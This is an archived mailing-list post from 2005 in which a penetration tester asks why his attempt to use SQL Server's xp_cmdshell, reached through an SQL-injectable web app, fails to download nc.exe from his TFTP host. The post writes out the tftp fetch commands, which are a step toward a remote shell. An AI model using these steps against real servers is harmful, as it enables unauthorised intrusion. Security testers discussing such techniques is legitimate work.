Penetration Testing mailing list archives

TFTP and XP_CMDSHELL - Weird

From: "Andres Molinetti" <andymolinetti () hotmail com>
Date: Wed, 22 Jun 2005 22:24:08 +0000

Hi, I am testing a Web App vulnerable to SQL Injection.
It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.

While trying to use the xp_cmdshell to upload nc.exe from my tftpd server tothe Webserver, I experienced some problems.


I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.

As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GETnc.exe c:\nc.exe". File is downloaded.

When I tried it through the wep app it failed. I tried directly through SQLQuery Analizer and it also failed.


SQL is running as a low priviledged account (sqlsvc)...

Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET nc.exec:\nc.exe" and IT FAILED.!!


I can easily deduce that the problem is the TFTP client (tftp.exe)...

Any Ideas?

_________________________________________________________________

Moda para esta temporada. Ponte al día de todas las tendencias.http://www.msn.es/Mujer/moda/default.asp

TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 22)
- Re: TFTP and XP_CMDSHELL - Weird Jose Selvi (Jun 23)
  - Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
  - Re: TFTP and XP_CMDSHELL - Weird Frederic Charpentier (Jun 23)
    - Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
    - Re: TFTP and XP_CMDSHELL - Weird Javier Fernandez-Sanguino (Jun 23)
    - Re: TFTP and XP_CMDSHELL - Weird - SOLVED Andres Molinetti (Jun 24)
- Re: TFTP and XP_CMDSHELL - Weird Diego Kellner (Jun 23)
  - Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)